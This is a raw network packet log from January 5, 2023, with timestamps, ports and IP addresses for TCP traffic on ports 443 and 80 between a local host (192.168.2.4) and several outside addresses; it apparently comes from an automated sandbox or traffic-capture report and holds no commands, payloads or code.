                                                                                                                                                                                    Jan 5, 2023 08:57:06.986138105 CET49711443192.168.2.420.190.159.22
                                                                                                                                                                                    Jan 5, 2023 08:57:06.989590883 CET4434971020.190.159.22192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:57:06.989624023 CET4434971020.190.159.22192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:57:06.989682913 CET4434971020.190.159.22192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:57:06.989713907 CET49710443192.168.2.420.190.159.22
                                                                                                                                                                                    Jan 5, 2023 08:57:06.989744902 CET4434971020.190.159.22192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:57:06.989763021 CET49710443192.168.2.420.190.159.22
                                                                                                                                                                                    Jan 5, 2023 08:57:06.989773989 CET4434971020.190.159.22192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:57:06.989830017 CET49710443192.168.2.420.190.159.22
                                                                                                                                                                                    Jan 5, 2023 08:57:06.991663933 CET49711443192.168.2.420.190.159.22
                                                                                                                                                                                    Jan 5, 2023 08:57:06.991700888 CET4434971120.190.159.22192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:57:06.991849899 CET49711443192.168.2.420.190.159.22
                                                                                                                                                                                    Jan 5, 2023 08:57:06.991868019 CET4434971120.190.159.22192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:57:06.994956017 CET49710443192.168.2.420.190.159.22
                                                                                                                                                                                    Jan 5, 2023 08:57:06.994983912 CET4434971020.190.159.22192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:57:06.995032072 CET49710443192.168.2.420.190.159.22
                                                                                                                                                                                    Jan 5, 2023 08:57:06.995040894 CET4434971020.190.159.22192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:57:43.406667948 CET8049689209.197.3.8192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:57:43.406850100 CET4968980192.168.2.4209.197.3.8
                                                                                                                                                                                    Jan 5, 2023 08:57:44.644205093 CET4968480192.168.2.493.184.220.29
                                                                                                                                                                                    Jan 5, 2023 08:57:46.166547060 CET49715443192.168.2.420.65.78.40
                                                                                                                                                                                    Jan 5, 2023 08:57:46.166608095 CET4434971520.65.78.40192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:57:46.166826010 CET49715443192.168.2.420.65.78.40
                                                                                                                                                                                    Jan 5, 2023 08:57:46.168179989 CET49715443192.168.2.420.65.78.40
                                                                                                                                                                                    Jan 5, 2023 08:57:46.168210983 CET4434971520.65.78.40192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:57:46.515465975 CET4434971520.65.78.40192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:57:46.515619993 CET49715443192.168.2.420.65.78.40
                                                                                                                                                                                    Jan 5, 2023 08:57:46.535022974 CET49715443192.168.2.420.65.78.40
                                                                                                                                                                                    Jan 5, 2023 08:57:46.535063028 CET4434971520.65.78.40192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:57:46.535285950 CET49715443192.168.2.420.65.78.40
                                                                                                                                                                                    Jan 5, 2023 08:57:46.535296917 CET4434971520.65.78.40192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:57:46.535496950 CET4434971520.65.78.40192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:57:46.535588026 CET49715443192.168.2.420.65.78.40
                                                                                                                                                                                    Jan 5, 2023 08:57:46.703984022 CET4434971520.65.78.40192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:57:46.704119921 CET49715443192.168.2.420.65.78.40
                                                                                                                                                                                    Jan 5, 2023 08:57:46.704123974 CET4434971520.65.78.40192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:57:46.704174042 CET49715443192.168.2.420.65.78.40
                                                                                                                                                                                    Jan 5, 2023 08:57:46.705166101 CET49715443192.168.2.420.65.78.40
                                                                                                                                                                                    Jan 5, 2023 08:57:46.705198050 CET4434971520.65.78.40192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:57:46.705214977 CET49715443192.168.2.420.65.78.40
                                                                                                                                                                                    Jan 5, 2023 08:57:46.705254078 CET49715443192.168.2.420.65.78.40
                                                                                                                                                                                    Jan 5, 2023 08:57:46.707845926 CET49716443192.168.2.420.65.78.40
                                                                                                                                                                                    Jan 5, 2023 08:57:46.707899094 CET4434971620.65.78.40192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:57:46.708000898 CET49716443192.168.2.420.65.78.40
                                                                                                                                                                                    Jan 5, 2023 08:57:46.708484888 CET49716443192.168.2.420.65.78.40
                                                                                                                                                                                    Jan 5, 2023 08:57:46.708503008 CET4434971620.65.78.40192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:57:47.040597916 CET4434971620.65.78.40192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:57:47.040782928 CET49716443192.168.2.420.65.78.40
                                                                                                                                                                                    Jan 5, 2023 08:57:47.041574001 CET49716443192.168.2.420.65.78.40
                                                                                                                                                                                    Jan 5, 2023 08:57:47.041605949 CET4434971620.65.78.40192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:57:47.044485092 CET49716443192.168.2.420.65.78.40
                                                                                                                                                                                    Jan 5, 2023 08:57:47.044503927 CET4434971620.65.78.40192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:57:47.250757933 CET4434971620.65.78.40192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:57:47.250849009 CET49716443192.168.2.420.65.78.40
                                                                                                                                                                                    Jan 5, 2023 08:57:47.250881910 CET4434971620.65.78.40192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:57:47.250905991 CET4434971620.65.78.40192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:57:47.250951052 CET49716443192.168.2.420.65.78.40
                                                                                                                                                                                    Jan 5, 2023 08:57:47.251435041 CET49716443192.168.2.420.65.78.40
                                                                                                                                                                                    Jan 5, 2023 08:57:47.251458883 CET4434971620.65.78.40192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:57:47.256416082 CET49717443192.168.2.420.65.78.40
                                                                                                                                                                                    Jan 5, 2023 08:57:47.256462097 CET4434971720.65.78.40192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:57:47.256536961 CET49717443192.168.2.420.65.78.40
                                                                                                                                                                                    Jan 5, 2023 08:57:47.258599043 CET49717443192.168.2.420.65.78.40
                                                                                                                                                                                    Jan 5, 2023 08:57:47.258624077 CET4434971720.65.78.40192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:57:47.589595079 CET4434971720.65.78.40192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:57:47.590076923 CET49717443192.168.2.420.65.78.40
                                                                                                                                                                                    Jan 5, 2023 08:57:47.590485096 CET49717443192.168.2.420.65.78.40
                                                                                                                                                                                    Jan 5, 2023 08:57:47.590496063 CET4434971720.65.78.40192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:57:47.620498896 CET49717443192.168.2.420.65.78.40
                                                                                                                                                                                    Jan 5, 2023 08:57:47.620522976 CET4434971720.65.78.40192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:57:47.750309944 CET4434971720.65.78.40192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:57:47.750437021 CET4434971720.65.78.40192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:57:47.750509024 CET49717443192.168.2.420.65.78.40
                                                                                                                                                                                    Jan 5, 2023 08:57:47.750924110 CET49717443192.168.2.420.65.78.40
                                                                                                                                                                                    Jan 5, 2023 08:57:47.750942945 CET4434971720.65.78.40192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:57:47.750967026 CET49717443192.168.2.420.65.78.40
                                                                                                                                                                                    Jan 5, 2023 08:57:47.750996113 CET49717443192.168.2.420.65.78.40
                                                                                                                                                                                    Jan 5, 2023 08:57:47.753359079 CET49718443192.168.2.420.65.78.40
                                                                                                                                                                                    Jan 5, 2023 08:57:47.753421068 CET4434971820.65.78.40192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:57:47.753577948 CET49718443192.168.2.420.65.78.40
                                                                                                                                                                                    Jan 5, 2023 08:57:47.753914118 CET49718443192.168.2.420.65.78.40
                                                                                                                                                                                    Jan 5, 2023 08:57:47.753942966 CET4434971820.65.78.40192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:57:47.800851107 CET804968793.184.221.240192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:57:47.800996065 CET4968780192.168.2.493.184.221.240
                                                                                                                                                                                    Jan 5, 2023 08:57:47.807290077 CET8049688178.79.242.0192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:57:47.807524920 CET4968880192.168.2.4178.79.242.0
                                                                                                                                                                                    Jan 5, 2023 08:57:47.807579994 CET4968880192.168.2.4178.79.242.0
                                                                                                                                                                                    Jan 5, 2023 08:57:47.835774899 CET8049688178.79.242.0192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:57:47.857547045 CET4968980192.168.2.4209.197.3.8
                                                                                                                                                                                    Jan 5, 2023 08:57:47.874628067 CET8049689209.197.3.8192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:57:47.874731064 CET4968980192.168.2.4209.197.3.8
                                                                                                                                                                                    Jan 5, 2023 08:57:48.091948032 CET4434971820.65.78.40192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:57:48.092046022 CET49718443192.168.2.420.65.78.40
                                                                                                                                                                                    Jan 5, 2023 08:57:48.092953920 CET49718443192.168.2.420.65.78.40
                                                                                                                                                                                    Jan 5, 2023 08:57:48.092974901 CET4434971820.65.78.40192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:57:48.099574089 CET49718443192.168.2.420.65.78.40
                                                                                                                                                                                    Jan 5, 2023 08:57:48.099611044 CET4434971820.65.78.40192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:57:48.267672062 CET4434971820.65.78.40192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:57:48.267800093 CET4434971820.65.78.40192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:57:48.267951965 CET49718443192.168.2.420.65.78.40
                                                                                                                                                                                    Jan 5, 2023 08:57:48.272290945 CET49718443192.168.2.420.65.78.40
                                                                                                                                                                                    Jan 5, 2023 08:57:48.272319078 CET4434971820.65.78.40192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:57:48.287754059 CET49719443192.168.2.420.65.78.40
                                                                                                                                                                                    Jan 5, 2023 08:57:48.287818909 CET4434971920.65.78.40192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:57:48.288611889 CET49719443192.168.2.420.65.78.40
                                                                                                                                                                                    Jan 5, 2023 08:57:48.289269924 CET49719443192.168.2.420.65.78.40
                                                                                                                                                                                    Jan 5, 2023 08:57:48.289299965 CET4434971920.65.78.40192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:57:48.626113892 CET4434971920.65.78.40192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:57:48.626287937 CET49719443192.168.2.420.65.78.40
                                                                                                                                                                                    Jan 5, 2023 08:57:48.626791000 CET49719443192.168.2.420.65.78.40
                                                                                                                                                                                    Jan 5, 2023 08:57:48.626805067 CET4434971920.65.78.40192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:57:48.628873110 CET49719443192.168.2.420.65.78.40
                                                                                                                                                                                    Jan 5, 2023 08:57:48.628890991 CET4434971920.65.78.40192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:57:48.798671961 CET4434971920.65.78.40192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:57:48.798835039 CET4434971920.65.78.40192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:57:48.798943996 CET49719443192.168.2.420.65.78.40
                                                                                                                                                                                    Jan 5, 2023 08:57:48.799881935 CET49719443192.168.2.420.65.78.40
                                                                                                                                                                                    Jan 5, 2023 08:57:48.799906015 CET4434971920.65.78.40192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:57:48.807080984 CET49720443192.168.2.420.65.78.40
                                                                                                                                                                                    Jan 5, 2023 08:57:48.807157993 CET4434972020.65.78.40192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:57:48.807261944 CET49720443192.168.2.420.65.78.40
                                                                                                                                                                                    Jan 5, 2023 08:57:48.808588028 CET49720443192.168.2.420.65.78.40
                                                                                                                                                                                    Jan 5, 2023 08:57:48.808620930 CET4434972020.65.78.40192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:57:49.142982006 CET4434972020.65.78.40192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:57:49.143126965 CET49720443192.168.2.420.65.78.40
                                                                                                                                                                                    Jan 5, 2023 08:57:49.154315948 CET49720443192.168.2.420.65.78.40
                                                                                                                                                                                    Jan 5, 2023 08:57:49.154347897 CET4434972020.65.78.40192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:57:49.159482002 CET49720443192.168.2.420.65.78.40
                                                                                                                                                                                    Jan 5, 2023 08:57:49.159507036 CET4434972020.65.78.40192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:57:49.450002909 CET4434972020.65.78.40192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:57:49.450167894 CET4434972020.65.78.40192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:57:49.450203896 CET49720443192.168.2.420.65.78.40
                                                                                                                                                                                    Jan 5, 2023 08:57:49.450254917 CET49720443192.168.2.420.65.78.40
                                                                                                                                                                                    Jan 5, 2023 08:57:49.450442076 CET49720443192.168.2.420.65.78.40
                                                                                                                                                                                    Jan 5, 2023 08:57:49.450464964 CET4434972020.65.78.40192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:57:49.450481892 CET49720443192.168.2.420.65.78.40
                                                                                                                                                                                    Jan 5, 2023 08:57:49.450536013 CET49720443192.168.2.420.65.78.40
                                                                                                                                                                                    Jan 5, 2023 08:57:49.517221928 CET49721443192.168.2.420.65.78.40
                                                                                                                                                                                    Jan 5, 2023 08:57:49.517283916 CET4434972120.65.78.40192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:57:49.518603086 CET49721443192.168.2.420.65.78.40
                                                                                                                                                                                    Jan 5, 2023 08:57:49.519802094 CET49721443192.168.2.420.65.78.40
                                                                                                                                                                                    Jan 5, 2023 08:57:49.519817114 CET4434972120.65.78.40192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:57:49.857848883 CET4434972120.65.78.40192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:57:49.858028889 CET49721443192.168.2.420.65.78.40
                                                                                                                                                                                    Jan 5, 2023 08:57:49.932627916 CET49721443192.168.2.420.65.78.40
                                                                                                                                                                                    Jan 5, 2023 08:57:49.932696104 CET4434972120.65.78.40192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:57:49.932837963 CET49721443192.168.2.420.65.78.40
                                                                                                                                                                                    Jan 5, 2023 08:57:49.932857990 CET4434972120.65.78.40192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:57:49.934176922 CET4434972120.65.78.40192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:57:49.934278965 CET49721443192.168.2.420.65.78.40
                                                                                                                                                                                    Jan 5, 2023 08:57:50.153510094 CET4434972120.65.78.40192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:57:50.153680086 CET4434972120.65.78.40192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:57:50.153778076 CET49721443192.168.2.420.65.78.40
                                                                                                                                                                                    Jan 5, 2023 08:57:50.237354040 CET49721443192.168.2.420.65.78.40
                                                                                                                                                                                    Jan 5, 2023 08:57:50.237354040 CET49721443192.168.2.420.65.78.40
                                                                                                                                                                                    Jan 5, 2023 08:57:50.237420082 CET4434972120.65.78.40192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:57:50.237500906 CET49721443192.168.2.420.65.78.40
                                                                                                                                                                                    Jan 5, 2023 08:57:50.239120960 CET49722443192.168.2.420.65.78.40
                                                                                                                                                                                    Jan 5, 2023 08:57:50.239164114 CET4434972220.65.78.40192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:57:50.239464998 CET49722443192.168.2.420.65.78.40
                                                                                                                                                                                    Jan 5, 2023 08:57:50.314728975 CET49722443192.168.2.420.65.78.40
                                                                                                                                                                                    Jan 5, 2023 08:57:50.314755917 CET4434972220.65.78.40192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:57:50.653348923 CET4434972220.65.78.40192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:57:50.653525114 CET49722443192.168.2.420.65.78.40
                                                                                                                                                                                    Jan 5, 2023 08:57:50.653992891 CET49722443192.168.2.420.65.78.40
                                                                                                                                                                                    Jan 5, 2023 08:57:50.654007912 CET4434972220.65.78.40192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:57:50.658704996 CET49722443192.168.2.420.65.78.40
                                                                                                                                                                                    Jan 5, 2023 08:57:50.658746004 CET4434972220.65.78.40192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:57:50.774840117 CET4434972220.65.78.40192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:57:50.775043964 CET4434972220.65.78.40192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:57:50.775168896 CET49722443192.168.2.420.65.78.40
                                                                                                                                                                                    Jan 5, 2023 08:57:51.143744946 CET49722443192.168.2.420.65.78.40
                                                                                                                                                                                    Jan 5, 2023 08:57:51.143783092 CET4434972220.65.78.40192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:57:51.143800020 CET49722443192.168.2.420.65.78.40
                                                                                                                                                                                    Jan 5, 2023 08:57:51.143855095 CET49722443192.168.2.420.65.78.40
                                                                                                                                                                                    Jan 5, 2023 08:57:51.167817116 CET49723443192.168.2.420.65.78.40
                                                                                                                                                                                    Jan 5, 2023 08:57:51.167907953 CET4434972320.65.78.40192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:57:51.168018103 CET49723443192.168.2.420.65.78.40
                                                                                                                                                                                    Jan 5, 2023 08:57:51.168339968 CET49723443192.168.2.420.65.78.40
                                                                                                                                                                                    Jan 5, 2023 08:57:51.168375969 CET4434972320.65.78.40192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:57:51.503806114 CET4434972320.65.78.40192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:57:51.504419088 CET49723443192.168.2.420.65.78.40
                                                                                                                                                                                    Jan 5, 2023 08:57:51.505065918 CET49723443192.168.2.420.65.78.40
                                                                                                                                                                                    Jan 5, 2023 08:57:51.505089045 CET4434972320.65.78.40192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:57:51.506838083 CET49723443192.168.2.420.65.78.40
                                                                                                                                                                                    Jan 5, 2023 08:57:51.506864071 CET4434972320.65.78.40192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:57:51.709053993 CET4434972320.65.78.40192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:57:51.709270000 CET4434972320.65.78.40192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:57:51.709274054 CET49723443192.168.2.420.65.78.40
                                                                                                                                                                                    Jan 5, 2023 08:57:51.709371090 CET49723443192.168.2.420.65.78.40
                                                                                                                                                                                    Jan 5, 2023 08:57:52.577862024 CET49723443192.168.2.420.65.78.40
                                                                                                                                                                                    Jan 5, 2023 08:57:52.577862024 CET49723443192.168.2.420.65.78.40
                                                                                                                                                                                    Jan 5, 2023 08:57:52.577919960 CET4434972320.65.78.40192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:57:52.578022003 CET49723443192.168.2.420.65.78.40
                                                                                                                                                                                    Jan 5, 2023 08:57:52.750267029 CET49724443192.168.2.420.65.78.40
                                                                                                                                                                                    Jan 5, 2023 08:57:52.750328064 CET4434972420.65.78.40192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:57:52.750403881 CET49724443192.168.2.420.65.78.40
                                                                                                                                                                                    Jan 5, 2023 08:57:52.750778913 CET49724443192.168.2.420.65.78.40
                                                                                                                                                                                    Jan 5, 2023 08:57:52.750799894 CET4434972420.65.78.40192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:57:53.089468002 CET4434972420.65.78.40192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:57:53.089606047 CET49724443192.168.2.420.65.78.40
                                                                                                                                                                                    Jan 5, 2023 08:57:53.090044022 CET49724443192.168.2.420.65.78.40
                                                                                                                                                                                    Jan 5, 2023 08:57:53.090073109 CET4434972420.65.78.40192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:57:53.095006943 CET49724443192.168.2.420.65.78.40
                                                                                                                                                                                    Jan 5, 2023 08:57:53.095031977 CET4434972420.65.78.40192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:57:53.257208109 CET4434972420.65.78.40192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:57:53.257390022 CET4434972420.65.78.40192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:57:53.257386923 CET49724443192.168.2.420.65.78.40
                                                                                                                                                                                    Jan 5, 2023 08:57:53.257469893 CET49724443192.168.2.420.65.78.40
                                                                                                                                                                                    Jan 5, 2023 08:57:53.280344963 CET49724443192.168.2.420.65.78.40
                                                                                                                                                                                    Jan 5, 2023 08:57:53.280414104 CET4434972420.65.78.40192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:57:53.285398006 CET49725443192.168.2.420.65.78.40
                                                                                                                                                                                    Jan 5, 2023 08:57:53.285445929 CET4434972520.65.78.40192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:57:53.285542011 CET49725443192.168.2.420.65.78.40
                                                                                                                                                                                    Jan 5, 2023 08:57:53.285784006 CET49725443192.168.2.420.65.78.40
                                                                                                                                                                                    Jan 5, 2023 08:57:53.285797119 CET4434972520.65.78.40192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:57:53.625159025 CET4434972520.65.78.40192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:57:53.625266075 CET49725443192.168.2.420.65.78.40
                                                                                                                                                                                    Jan 5, 2023 08:57:53.625693083 CET49725443192.168.2.420.65.78.40
                                                                                                                                                                                    Jan 5, 2023 08:57:53.625714064 CET4434972520.65.78.40192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:57:53.627887964 CET49725443192.168.2.420.65.78.40
                                                                                                                                                                                    Jan 5, 2023 08:57:53.627907038 CET4434972520.65.78.40192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:57:53.748419046 CET4434972520.65.78.40192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:57:53.748572111 CET49725443192.168.2.420.65.78.40
                                                                                                                                                                                    Jan 5, 2023 08:57:53.748599052 CET4434972520.65.78.40192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:57:53.748644114 CET49725443192.168.2.420.65.78.40
                                                                                                                                                                                    Jan 5, 2023 08:57:53.748665094 CET4434972520.65.78.40192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:57:53.748682022 CET49725443192.168.2.420.65.78.40
                                                                                                                                                                                    Jan 5, 2023 08:57:53.752268076 CET49726443192.168.2.420.65.78.40
                                                                                                                                                                                    Jan 5, 2023 08:57:53.752351046 CET4434972620.65.78.40192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:57:53.752476931 CET49726443192.168.2.420.65.78.40
                                                                                                                                                                                    Jan 5, 2023 08:57:53.752965927 CET49726443192.168.2.420.65.78.40
                                                                                                                                                                                    Jan 5, 2023 08:57:53.753001928 CET4434972620.65.78.40192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:57:54.095415115 CET4434972620.65.78.40192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:57:54.095746040 CET49726443192.168.2.420.65.78.40
                                                                                                                                                                                    Jan 5, 2023 08:57:54.096631050 CET49726443192.168.2.420.65.78.40
                                                                                                                                                                                    Jan 5, 2023 08:57:54.096663952 CET4434972620.65.78.40192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:57:54.099390030 CET49726443192.168.2.420.65.78.40
                                                                                                                                                                                    Jan 5, 2023 08:57:54.099420071 CET4434972620.65.78.40192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:57:54.230006933 CET4434972620.65.78.40192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:57:54.230125904 CET4434972620.65.78.40192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:57:54.230138063 CET49726443192.168.2.420.65.78.40
                                                                                                                                                                                    Jan 5, 2023 08:57:54.230190039 CET49726443192.168.2.420.65.78.40
                                                                                                                                                                                    Jan 5, 2023 08:57:54.230304956 CET49726443192.168.2.420.65.78.40
                                                                                                                                                                                    Jan 5, 2023 08:57:54.230349064 CET4434972620.65.78.40192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:57:54.230376005 CET49726443192.168.2.420.65.78.40
                                                                                                                                                                                    Jan 5, 2023 08:57:54.230413914 CET49726443192.168.2.420.65.78.40
                                                                                                                                                                                    Jan 5, 2023 08:57:54.232163906 CET49727443192.168.2.420.65.78.40
                                                                                                                                                                                    Jan 5, 2023 08:57:54.232218981 CET4434972720.65.78.40192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:57:54.232558012 CET49727443192.168.2.420.65.78.40
                                                                                                                                                                                    Jan 5, 2023 08:57:54.232558012 CET49727443192.168.2.420.65.78.40
                                                                                                                                                                                    Jan 5, 2023 08:57:54.232608080 CET4434972720.65.78.40192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:57:54.573602915 CET4434972720.65.78.40192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:57:54.573731899 CET49727443192.168.2.420.65.78.40
                                                                                                                                                                                    Jan 5, 2023 08:57:54.600745916 CET49727443192.168.2.420.65.78.40
                                                                                                                                                                                    Jan 5, 2023 08:57:54.600769997 CET4434972720.65.78.40192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:57:54.606734991 CET49727443192.168.2.420.65.78.40
                                                                                                                                                                                    Jan 5, 2023 08:57:54.606774092 CET4434972720.65.78.40192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:57:54.826620102 CET4434972720.65.78.40192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:57:54.826838017 CET4434972720.65.78.40192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:57:54.826898098 CET49727443192.168.2.420.65.78.40
                                                                                                                                                                                    Jan 5, 2023 08:57:54.826899052 CET49727443192.168.2.420.65.78.40
                                                                                                                                                                                    Jan 5, 2023 08:57:54.827402115 CET49727443192.168.2.420.65.78.40
                                                                                                                                                                                    Jan 5, 2023 08:57:54.827402115 CET49727443192.168.2.420.65.78.40
                                                                                                                                                                                    Jan 5, 2023 08:57:54.827429056 CET4434972720.65.78.40192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:57:54.827555895 CET49727443192.168.2.420.65.78.40
                                                                                                                                                                                    Jan 5, 2023 08:57:54.829859018 CET49728443192.168.2.420.65.78.40
                                                                                                                                                                                    Jan 5, 2023 08:57:54.829977989 CET4434972820.65.78.40192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:57:54.830080032 CET49728443192.168.2.420.65.78.40
                                                                                                                                                                                    Jan 5, 2023 08:57:54.830537081 CET49728443192.168.2.420.65.78.40
                                                                                                                                                                                    Jan 5, 2023 08:57:54.830594063 CET4434972820.65.78.40192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:57:55.175599098 CET4434972820.65.78.40192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:57:55.175772905 CET49728443192.168.2.420.65.78.40
                                                                                                                                                                                    Jan 5, 2023 08:57:55.182337046 CET49728443192.168.2.420.65.78.40
                                                                                                                                                                                    Jan 5, 2023 08:57:55.182373047 CET4434972820.65.78.40192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:57:55.186544895 CET49728443192.168.2.420.65.78.40
                                                                                                                                                                                    Jan 5, 2023 08:57:55.186579943 CET4434972820.65.78.40192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:57:55.429907084 CET4434972820.65.78.40192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:57:55.429991961 CET49728443192.168.2.420.65.78.40
                                                                                                                                                                                    Jan 5, 2023 08:57:55.430016994 CET4434972820.65.78.40192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:57:55.430062056 CET4434972820.65.78.40192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:57:55.430063009 CET49728443192.168.2.420.65.78.40
                                                                                                                                                                                    Jan 5, 2023 08:57:55.430085897 CET4434972820.65.78.40192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:57:55.430099964 CET49728443192.168.2.420.65.78.40
                                                                                                                                                                                    Jan 5, 2023 08:57:55.430141926 CET49728443192.168.2.420.65.78.40
                                                                                                                                                                                    Jan 5, 2023 08:57:55.430180073 CET49728443192.168.2.420.65.78.40
                                                                                                                                                                                    Jan 5, 2023 08:58:10.600919962 CET49731443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.601001978 CET4434973180.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:10.601089954 CET49731443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.602040052 CET49732443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:10.602121115 CET4434973280.67.82.211192.168.2.4
